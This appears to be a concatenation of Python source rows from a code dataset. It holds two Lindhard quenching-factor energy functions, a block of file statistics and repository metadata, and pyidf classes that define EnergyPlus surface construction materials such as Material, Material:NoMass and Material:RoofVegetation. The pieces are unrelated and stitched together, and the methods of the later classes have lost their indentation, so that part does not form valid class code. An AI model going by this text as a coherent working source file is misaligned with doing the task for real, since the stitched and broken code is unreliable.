def energy_phonon_from_energy_nr(e_r_nr, Z, k, e_delta_v, epsilon):
    """Total phonon energy from nuclear-recoil energy.

    Computes ``e_r_nr * (1 + y * e_delta_v / epsilon)`` where ``y`` is the
    Lindhard quenching factor (cf. Eq. 4 in https://arxiv.org/abs/1610.00006).

    :param e_r_nr: nuclear-recoil energies (array-like; must yield an
        ndarray from the quenching-factor helper)
    :param Z: atomic number of the target
    :param k: Lindhard ``k`` parameter
    :param e_delta_v: detector bias-voltage energy parameter
    :param epsilon: average energy per electron-hole pair
    :return: phonon energies, same shape as ``e_r_nr``
    :raises ValueError: if the quenching factor is not a numpy array
    """
    y = lindhard_quenching_factor(e_r_nr, atomic_number_z=Z, k=k)
    if not isinstance(y, np.ndarray):
        # Informative message instead of the former bare ValueError.
        raise ValueError(
            f'lindhard_quenching_factor returned {type(y).__name__}, '
            'expected a numpy array; pass e_r_nr as an array')
    return e_r_nr * (1 + y * (e_delta_v / epsilon))
def energy_ionization_from_e_nr(e_r_nr, Z, k):
    """Ionization energy from nuclear-recoil energy.

    Computes ``e_r_nr * y`` where ``y`` is the Lindhard quenching factor.

    :param e_r_nr: nuclear-recoil energies (array-like; must yield an
        ndarray from the quenching-factor helper)
    :param Z: atomic number of the target
    :param k: Lindhard ``k`` parameter
    :return: ionization energies, same shape as ``e_r_nr``
    :raises ValueError: if the quenching factor is not a numpy array
    """
    y = lindhard_quenching_factor(e_r_nr, atomic_number_z=Z, k=k)
    if not isinstance(y, np.ndarray):
        # Informative message instead of the former bare ValueError.
        raise ValueError(
            f'lindhard_quenching_factor returned {type(y).__name__}, '
            'expected a numpy array; pass e_r_nr as an array')
    return e_r_nr * y
| 37.031056
| 100
| 0.646344
| 1,629
| 11,924
| 4.361572
| 0.121547
| 0.045039
| 0.05855
| 0.038283
| 0.850387
| 0.83772
| 0.774947
| 0.75651
| 0.726953
| 0.72076
| 0
| 0.035843
| 0.253606
| 11,924
| 321
| 101
| 37.146417
| 0.762472
| 0.128145
| 0
| 0.658436
| 0
| 0
| 0.065649
| 0.009001
| 0
| 0
| 0
| 0
| 0.016461
| 1
| 0.111111
| false
| 0
| 0.024691
| 0.016461
| 0.547325
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
fbc57ff509fe0fdcfd51d82211eb83705dac0978
| 957,621
|
py
|
Python
|
pyidf/surface_construction_elements.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 19
|
2015-12-08T23:33:51.000Z
|
2022-01-31T04:41:10.000Z
|
pyidf/surface_construction_elements.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 2
|
2019-10-04T10:57:00.000Z
|
2021-10-01T06:46:17.000Z
|
pyidf/surface_construction_elements.py
|
marcelosalles/pyidf
|
c2f744211572b5e14e29522aac1421ba88addb0e
|
[
"Apache-2.0"
] | 7
|
2015-11-04T02:25:01.000Z
|
2021-12-08T03:14:28.000Z
|
""" Data objects in group "Surface Construction Elements"
"""
from collections import OrderedDict
import logging
from pyidf.helper import DataObject
logger = logging.getLogger("pyidf")
logger.addHandler(logging.NullHandler())
class Material(DataObject):

    """Corresponds to IDD object `Material` Regular materials described with
    full set of thermal properties."""

    # IDD schema consumed by DataObject: per-field metadata (type, unit,
    # default, bounds) driving validation and IDF (de)serialization.
    # Note: 'minimum>' denotes an exclusive lower bound; 'minimum' inclusive.
    # Field order in the OrderedDict mirrors the IDD field order.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'roughness',
                                       {'name': u'Roughness',
                                        'pyname': u'roughness',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'VeryRough',
                                                            u'Rough',
                                                            u'MediumRough',
                                                            u'MediumSmooth',
                                                            u'Smooth',
                                                            u'VerySmooth'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'thickness',
                                       {'name': u'Thickness',
                                        'pyname': u'thickness',
                                        'minimum>': 0.0,
                                        'maximum': 3.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'conductivity',
                                       {'name': u'Conductivity',
                                        'pyname': u'conductivity',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K'}),
                                      (u'density',
                                       {'name': u'Density',
                                        'pyname': u'density',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/m3'}),
                                      (u'specific heat',
                                       {'name': u'Specific Heat',
                                        'pyname': u'specific_heat',
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 100.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'J/kg-K'}),
                                      (u'thermal absorptance',
                                       {'name': u'Thermal Absorptance',
                                        'pyname': u'thermal_absorptance',
                                        'default': 0.9,
                                        'minimum>': 0.0,
                                        'maximum': 0.99999,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'solar absorptance',
                                       {'name': u'Solar Absorptance',
                                        'pyname': u'solar_absorptance',
                                        'default': 0.7,
                                        'maximum': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'visible absorptance',
                                       {'name': u'Visible Absorptance',
                                        'pyname': u'visible_absorptance',
                                        'default': 0.7,
                                        'maximum': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 6,
               'name': u'Material',
               'pyname': u'Material',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def roughness(self):
        """field `Roughness`

        Args:
            value (str): value for IDD Field `Roughness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `roughness` or None if not set
        """
        return self["Roughness"]

    @roughness.setter
    def roughness(self, value=None):
        """Corresponds to IDD field `Roughness`"""
        self["Roughness"] = value

    @property
    def thickness(self):
        """field `Thickness`

        |  Units: m
        |  IP-Units: in
        |  value <= 3.0

        Args:
            value (float): value for IDD Field `Thickness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `thickness` or None if not set
        """
        return self["Thickness"]

    @thickness.setter
    def thickness(self, value=None):
        """Corresponds to IDD field `Thickness`"""
        self["Thickness"] = value

    @property
    def conductivity(self):
        """field `Conductivity`

        |  Units: W/m-K

        Args:
            value (float): value for IDD Field `Conductivity`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `conductivity` or None if not set
        """
        return self["Conductivity"]

    @conductivity.setter
    def conductivity(self, value=None):
        """Corresponds to IDD field `Conductivity`"""
        self["Conductivity"] = value

    @property
    def density(self):
        """field `Density`

        |  Units: kg/m3

        Args:
            value (float): value for IDD Field `Density`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `density` or None if not set
        """
        return self["Density"]

    @density.setter
    def density(self, value=None):
        """Corresponds to IDD field `Density`"""
        self["Density"] = value

    @property
    def specific_heat(self):
        """field `Specific Heat`

        |  Units: J/kg-K
        |  value >= 100.0

        Args:
            value (float): value for IDD Field `Specific Heat`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `specific_heat` or None if not set
        """
        return self["Specific Heat"]

    @specific_heat.setter
    def specific_heat(self, value=None):
        """Corresponds to IDD field `Specific Heat`"""
        self["Specific Heat"] = value

    @property
    def thermal_absorptance(self):
        """field `Thermal Absorptance`

        |  Default value: 0.9
        |  value <= 0.99999

        Args:
            value (float): value for IDD Field `Thermal Absorptance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `thermal_absorptance` or None if not set
        """
        return self["Thermal Absorptance"]

    @thermal_absorptance.setter
    def thermal_absorptance(self, value=0.9):
        """Corresponds to IDD field `Thermal Absorptance`"""
        self["Thermal Absorptance"] = value

    @property
    def solar_absorptance(self):
        """field `Solar Absorptance`

        |  Default value: 0.7
        |  value <= 1.0

        Args:
            value (float): value for IDD Field `Solar Absorptance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `solar_absorptance` or None if not set
        """
        return self["Solar Absorptance"]

    @solar_absorptance.setter
    def solar_absorptance(self, value=0.7):
        """Corresponds to IDD field `Solar Absorptance`"""
        self["Solar Absorptance"] = value

    @property
    def visible_absorptance(self):
        """field `Visible Absorptance`

        |  Default value: 0.7
        |  value <= 1.0

        Args:
            value (float): value for IDD Field `Visible Absorptance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `visible_absorptance` or None if not set
        """
        return self["Visible Absorptance"]

    @visible_absorptance.setter
    def visible_absorptance(self, value=0.7):
        """Corresponds to IDD field `Visible Absorptance`"""
        self["Visible Absorptance"] = value
class MaterialNoMass(DataObject):

    """ Corresponds to IDD object `Material:NoMass`
        Regular materials properties described whose principal description is R (Thermal Resistance)
    """

    # IDD schema consumed by DataObject: per-field metadata (type, unit,
    # default, bounds) driving validation and IDF (de)serialization.
    # Note: 'minimum>' denotes an exclusive lower bound; 'minimum' inclusive.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'roughness',
                                       {'name': u'Roughness',
                                        'pyname': u'roughness',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'VeryRough',
                                                            u'Rough',
                                                            u'MediumRough',
                                                            u'MediumSmooth',
                                                            u'Smooth',
                                                            u'VerySmooth'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'thermal resistance',
                                       {'name': u'Thermal Resistance',
                                        'pyname': u'thermal_resistance',
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.001,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm2-K/W'}),
                                      (u'thermal absorptance',
                                       {'name': u'Thermal Absorptance',
                                        'pyname': u'thermal_absorptance',
                                        'default': 0.9,
                                        'minimum>': 0.0,
                                        'maximum': 0.99999,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'solar absorptance',
                                       {'name': u'Solar Absorptance',
                                        'pyname': u'solar_absorptance',
                                        'default': 0.7,
                                        'maximum': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'visible absorptance',
                                       {'name': u'Visible Absorptance',
                                        'pyname': u'visible_absorptance',
                                        'default': 0.7,
                                        'maximum': 1.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'})]),
               'format': None,
               'group': u'Surface Construction Elements',
               'min-fields': 3,
               'name': u'Material:NoMass',
               'pyname': u'MaterialNoMass',
               'required-object': False,
               'unique-object': False}

    @property
    def name(self):
        """field `Name`

        Args:
            value (str): value for IDD Field `Name`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `name` or None if not set
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def roughness(self):
        """field `Roughness`

        Args:
            value (str): value for IDD Field `Roughness`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            str: the value of `roughness` or None if not set
        """
        return self["Roughness"]

    @roughness.setter
    def roughness(self, value=None):
        """Corresponds to IDD field `Roughness`"""
        self["Roughness"] = value

    @property
    def thermal_resistance(self):
        """field `Thermal Resistance`

        |  Units: m2-K/W
        |  value >= 0.001

        Args:
            value (float): value for IDD Field `Thermal Resistance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `thermal_resistance` or None if not set
        """
        return self["Thermal Resistance"]

    @thermal_resistance.setter
    def thermal_resistance(self, value=None):
        """Corresponds to IDD field `Thermal Resistance`"""
        self["Thermal Resistance"] = value

    @property
    def thermal_absorptance(self):
        """field `Thermal Absorptance`

        |  Default value: 0.9
        |  value <= 0.99999

        Args:
            value (float): value for IDD Field `Thermal Absorptance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `thermal_absorptance` or None if not set
        """
        return self["Thermal Absorptance"]

    @thermal_absorptance.setter
    def thermal_absorptance(self, value=0.9):
        """Corresponds to IDD field `Thermal Absorptance`"""
        self["Thermal Absorptance"] = value

    @property
    def solar_absorptance(self):
        """field `Solar Absorptance`

        |  Default value: 0.7
        |  value <= 1.0

        Args:
            value (float): value for IDD Field `Solar Absorptance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `solar_absorptance` or None if not set
        """
        return self["Solar Absorptance"]

    @solar_absorptance.setter
    def solar_absorptance(self, value=0.7):
        """Corresponds to IDD field `Solar Absorptance`"""
        self["Solar Absorptance"] = value

    @property
    def visible_absorptance(self):
        """field `Visible Absorptance`

        |  Default value: 0.7
        |  value <= 1.0

        Args:
            value (float): value for IDD Field `Visible Absorptance`

        Raises:
            ValueError: if `value` is not a valid value

        Returns:
            float: the value of `visible_absorptance` or None if not set
        """
        return self["Visible Absorptance"]

    @visible_absorptance.setter
    def visible_absorptance(self, value=0.7):
        """Corresponds to IDD field `Visible Absorptance`"""
        self["Visible Absorptance"] = value
class MaterialInfraredTransparent(DataObject):

    """Corresponds to IDD object `Material:InfraredTransparent`.

    Special infrared-transparent material, similar to a Material:Nomass
    with low thermal resistance and high absorptance in both wavelengths.
    Area will be doubled internally to make internal radiant exchange
    accurate. Should be the only material in a single-layer surface
    construction. All thermal properties are set internally; the user
    supplies only the name. Cannot be used with ConductionFiniteDifference
    solution algorithms.
    """

    # Single-field IDD schema: only the object name is user-settable.
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name', {
                'name': u'Name',
                'pyname': u'name',
                'required-field': True,
                'autosizable': False,
                'autocalculatable': False,
                'type': u'alpha',
            }),
        ]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 1,
        'name': u'Material:InfraredTransparent',
        'pyname': u'MaterialInfraredTransparent',
        'required-object': False,
        'unique-object': False,
    }

    @property
    def name(self):
        """str: the value of IDD field `Name`, or None if not set.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value
class MaterialAirGap(DataObject):

    """Corresponds to IDD object `Material:AirGap`.

    An air space in an opaque construction, described by its thermal
    resistance only.
    """

    # IDD schema: name plus a required, strictly-positive thermal resistance.
    # ('minimum>' denotes an exclusive lower bound.)
    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            (u'name', {
                'name': u'Name',
                'pyname': u'name',
                'required-field': True,
                'autosizable': False,
                'autocalculatable': False,
                'type': u'alpha',
            }),
            (u'thermal resistance', {
                'name': u'Thermal Resistance',
                'pyname': u'thermal_resistance',
                'minimum>': 0.0,
                'required-field': True,
                'autosizable': False,
                'autocalculatable': False,
                'type': u'real',
                'unit': u'm2-K/W',
            }),
        ]),
        'format': None,
        'group': u'Surface Construction Elements',
        'min-fields': 2,
        'name': u'Material:AirGap',
        'pyname': u'MaterialAirGap',
        'required-object': False,
        'unique-object': False,
    }

    @property
    def name(self):
        """str: the value of IDD field `Name`, or None if not set.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Name"]

    @name.setter
    def name(self, value=None):
        """Corresponds to IDD field `Name`"""
        self["Name"] = value

    @property
    def thermal_resistance(self):
        """float: the value of IDD field `Thermal Resistance` (m2-K/W),
        or None if not set.

        Raises:
            ValueError: if assigned an invalid value.
        """
        return self["Thermal Resistance"]

    @thermal_resistance.setter
    def thermal_resistance(self, value=None):
        """Corresponds to IDD field `Thermal Resistance`"""
        self["Thermal Resistance"] = value
class MaterialRoofVegetation(DataObject):
""" Corresponds to IDD object `Material:RoofVegetation`
EcoRoof model, plant layer plus soil layer
Implemented by Portland State University
(Sailor et al., January, 2007)
only one material must be referenced per simulation though the same EcoRoof material could be
used in multiple constructions. New moisture redistribution scheme (2010) requires higher
number of timesteps per hour (minimum 12 recommended).
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'height of plants',
{'name': u'Height of Plants',
'pyname': u'height_of_plants',
'default': 0.2,
'minimum>': 0.005,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'leaf area index',
{'name': u'Leaf Area Index',
'pyname': u'leaf_area_index',
'default': 1.0,
'minimum>': 0.001,
'maximum': 5.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'leaf reflectivity',
{'name': u'Leaf Reflectivity',
'pyname': u'leaf_reflectivity',
'default': 0.22,
'maximum': 0.5,
'required-field': True,
'autosizable': False,
'minimum': 0.05,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'leaf emissivity',
{'name': u'Leaf Emissivity',
'pyname': u'leaf_emissivity',
'default': 0.95,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.8,
'autocalculatable': False,
'type': u'real'}),
(u'minimum stomatal resistance',
{'name': u'Minimum Stomatal Resistance',
'pyname': u'minimum_stomatal_resistance',
'default': 180.0,
'maximum': 300.0,
'required-field': False,
'autosizable': False,
'minimum': 50.0,
'autocalculatable': False,
'type': u'real',
'unit': u's/m'}),
(u'soil layer name',
{'name': u'Soil Layer Name',
'pyname': u'soil_layer_name',
'default': u'Green Roof Soil',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'roughness',
{'name': u'Roughness',
'pyname': u'roughness',
'default': u'MediumRough',
'required-field': True,
'autosizable': False,
'accepted-values': [u'VeryRough',
u'MediumRough',
u'Rough',
u'Smooth',
u'MediumSmooth',
u'VerySmooth'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'default': 0.1,
'minimum>': 0.05,
'maximum': 0.7,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'conductivity of dry soil',
{'name': u'Conductivity of Dry Soil',
'pyname': u'conductivity_of_dry_soil',
'default': 0.35,
'maximum': 1.5,
'required-field': True,
'autosizable': False,
'minimum': 0.2,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'density of dry soil',
{'name': u'Density of Dry Soil',
'pyname': u'density_of_dry_soil',
'default': 1100.0,
'maximum': 2000.0,
'required-field': True,
'autosizable': False,
'minimum': 300.0,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m3'}),
(u'specific heat of dry soil',
{'name': u'Specific Heat of Dry Soil',
'pyname': u'specific_heat_of_dry_soil',
'default': 1200.0,
'minimum>': 500.0,
'maximum': 2000.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K'}),
(u'thermal absorptance',
{'name': u'Thermal Absorptance',
'pyname': u'thermal_absorptance',
'default': 0.9,
'minimum>': 0.8,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar absorptance',
{'name': u'Solar Absorptance',
'pyname': u'solar_absorptance',
'default': 0.7,
'maximum': 0.9,
'required-field': False,
'autosizable': False,
'minimum': 0.4,
'autocalculatable': False,
'type': u'real'}),
(u'visible absorptance',
{'name': u'Visible Absorptance',
'pyname': u'visible_absorptance',
'default': 0.75,
'minimum>': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'saturation volumetric moisture content of the soil layer',
{'name': u'Saturation Volumetric Moisture Content of the Soil Layer',
'pyname': u'saturation_volumetric_moisture_content_of_the_soil_layer',
'default': 0.3,
'minimum>': 0.1,
'maximum': 0.5,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'residual volumetric moisture content of the soil layer',
{'name': u'Residual Volumetric Moisture Content of the Soil Layer',
'pyname': u'residual_volumetric_moisture_content_of_the_soil_layer',
'default': 0.01,
'maximum': 0.1,
'required-field': False,
'autosizable': False,
'minimum': 0.01,
'autocalculatable': False,
'type': u'real'}),
(u'initial volumetric moisture content of the soil layer',
{'name': u'Initial Volumetric Moisture Content of the Soil Layer',
'pyname': u'initial_volumetric_moisture_content_of_the_soil_layer',
'default': 0.1,
'minimum>': 0.05,
'maximum': 0.5,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'moisture diffusion calculation method',
{'name': u'Moisture Diffusion Calculation Method',
'pyname': u'moisture_diffusion_calculation_method',
'default': u'Advanced',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Simple',
u'Advanced'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 18,
'name': u'Material:RoofVegetation',
'pyname': u'MaterialRoofVegetation',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def height_of_plants(self):
"""field `Height of Plants`
| The ecoroof module is designed for short plants and shrubs.
| Units: m
| Default value: 0.2
| value > 0.005
| value <= 1.0
Args:
value (float): value for IDD Field `Height of Plants`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `height_of_plants` or None if not set
"""
return self["Height of Plants"]
@height_of_plants.setter
def height_of_plants(self, value=0.2):
"""Corresponds to IDD field `Height of Plants`"""
self["Height of Plants"] = value
@property
def leaf_area_index(self):
"""field `Leaf Area Index`
| Entire surface is assumed covered, so decrease LAI accordingly.
| Units: dimensionless
| Default value: 1.0
| value > 0.001
| value <= 5.0
Args:
value (float): value for IDD Field `Leaf Area Index`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `leaf_area_index` or None if not set
"""
return self["Leaf Area Index"]
@leaf_area_index.setter
def leaf_area_index(self, value=1.0):
"""Corresponds to IDD field `Leaf Area Index`"""
self["Leaf Area Index"] = value
@property
def leaf_reflectivity(self):
"""field `Leaf Reflectivity`
| Leaf reflectivity (albedo) is typically 0.18-0.25
| Units: dimensionless
| Default value: 0.22
| value >= 0.05
| value <= 0.5
Args:
value (float): value for IDD Field `Leaf Reflectivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `leaf_reflectivity` or None if not set
"""
return self["Leaf Reflectivity"]
@leaf_reflectivity.setter
def leaf_reflectivity(self, value=0.22):
"""Corresponds to IDD field `Leaf Reflectivity`"""
self["Leaf Reflectivity"] = value
@property
def leaf_emissivity(self):
"""field `Leaf Emissivity`
| Default value: 0.95
| value >= 0.8
| value <= 1.0
Args:
value (float): value for IDD Field `Leaf Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `leaf_emissivity` or None if not set
"""
return self["Leaf Emissivity"]
@leaf_emissivity.setter
def leaf_emissivity(self, value=0.95):
"""Corresponds to IDD field `Leaf Emissivity`"""
self["Leaf Emissivity"] = value
@property
def minimum_stomatal_resistance(self):
"""field `Minimum Stomatal Resistance`
| This depends upon plant type
| Units: s/m
| Default value: 180.0
| value >= 50.0
| value <= 300.0
Args:
value (float): value for IDD Field `Minimum Stomatal Resistance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_stomatal_resistance` or None if not set
"""
return self["Minimum Stomatal Resistance"]
@minimum_stomatal_resistance.setter
def minimum_stomatal_resistance(self, value=180.0):
"""Corresponds to IDD field `Minimum Stomatal Resistance`"""
self["Minimum Stomatal Resistance"] = value
@property
def soil_layer_name(self):
"""field `Soil Layer Name`
| Default value: Green Roof Soil
Args:
value (str): value for IDD Field `Soil Layer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `soil_layer_name` or None if not set
"""
return self["Soil Layer Name"]
@soil_layer_name.setter
def soil_layer_name(self, value="Green Roof Soil"):
"""Corresponds to IDD field `Soil Layer Name`"""
self["Soil Layer Name"] = value
@property
def roughness(self):
"""field `Roughness`
| Default value: MediumRough
Args:
value (str): value for IDD Field `Roughness`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `roughness` or None if not set
"""
return self["Roughness"]
@roughness.setter
def roughness(self, value="MediumRough"):
"""Corresponds to IDD field `Roughness`"""
self["Roughness"] = value
@property
def thickness(self):
"""field `Thickness`
| thickness of the soil layer of the EcoRoof
| Soil depths of 0.15m (6in) and 0.30m (12in) are common.
| Units: m
| IP-Units: in
| Default value: 0.1
| value > 0.05
| value <= 0.7
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=0.1):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def conductivity_of_dry_soil(self):
    """Return IDD field `Conductivity of Dry Soil`.

    | Thermal conductivity of dry soil; typical ecoroof soils are 0.3-0.5.
    | Units: W/m-K
    | Default value: 0.35
    | Valid range: 0.2 <= value <= 1.5

    Returns:
        float: current value of `conductivity_of_dry_soil`, or None if not set.
    """
    return self["Conductivity of Dry Soil"]

@conductivity_of_dry_soil.setter
def conductivity_of_dry_soil(self, value=0.35):
    """Set IDD field `Conductivity of Dry Soil`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Conductivity of Dry Soil"] = value
@property
def density_of_dry_soil(self):
    """Return IDD field `Density of Dry Soil`.

    | The simulation code modifies this value as the soil becomes moist;
    | typical ecoroof soils range from 400 to 1000 (dry to wet).
    | Units: kg/m3
    | Default value: 1100.0
    | Valid range: 300.0 <= value <= 2000.0

    Returns:
        float: current value of `density_of_dry_soil`, or None if not set.
    """
    return self["Density of Dry Soil"]

@density_of_dry_soil.setter
def density_of_dry_soil(self, value=1100.0):
    """Set IDD field `Density of Dry Soil`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Density of Dry Soil"] = value
@property
def specific_heat_of_dry_soil(self):
    """Return IDD field `Specific Heat of Dry Soil`.

    | Units: J/kg-K
    | Default value: 1200.0
    | Valid range: 500.0 < value <= 2000.0

    Returns:
        float: current value of `specific_heat_of_dry_soil`, or None if not set.
    """
    return self["Specific Heat of Dry Soil"]

@specific_heat_of_dry_soil.setter
def specific_heat_of_dry_soil(self, value=1200.0):
    """Set IDD field `Specific Heat of Dry Soil`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Specific Heat of Dry Soil"] = value
@property
def thermal_absorptance(self):
    """Return IDD field `Thermal Absorptance`.

    | Soil emissivity is typically in the range 0.90 to 0.98.
    | Default value: 0.9
    | Valid range: 0.8 < value <= 1.0

    Returns:
        float: current value of `thermal_absorptance`, or None if not set.
    """
    return self["Thermal Absorptance"]

@thermal_absorptance.setter
def thermal_absorptance(self, value=0.9):
    """Set IDD field `Thermal Absorptance`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Thermal Absorptance"] = value
@property
def solar_absorptance(self):
    """Return IDD field `Solar Absorptance`.

    | Solar absorptance of dry soil (1-albedo) is typically 0.60 to 0.85,
    | corresponding to a dry albedo of 0.15 to 0.40.
    | Default value: 0.7
    | Valid range: 0.4 <= value <= 0.9

    Returns:
        float: current value of `solar_absorptance`, or None if not set.
    """
    return self["Solar Absorptance"]

@solar_absorptance.setter
def solar_absorptance(self, value=0.7):
    """Set IDD field `Solar Absorptance`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Solar Absorptance"] = value
@property
def visible_absorptance(self):
    """Return IDD field `Visible Absorptance`.

    | Default value: 0.75
    | Valid range: 0.5 < value <= 1.0

    Returns:
        float: current value of `visible_absorptance`, or None if not set.
    """
    return self["Visible Absorptance"]

@visible_absorptance.setter
def visible_absorptance(self, value=0.75):
    """Set IDD field `Visible Absorptance`.

    Args:
        value (float): new field value; an invalid value raises ValueError.
    """
    self["Visible Absorptance"] = value
@property
def saturation_volumetric_moisture_content_of_the_soil_layer(self):
    """Return IDD field `Saturation Volumetric Moisture Content of the Soil Layer`.

    | Maximum moisture content is typically less than 0.5.
    | Default value: 0.3
    | Valid range: 0.1 < value <= 0.5

    Returns:
        float: current field value, or None if not set.
    """
    return self["Saturation Volumetric Moisture Content of the Soil Layer"]

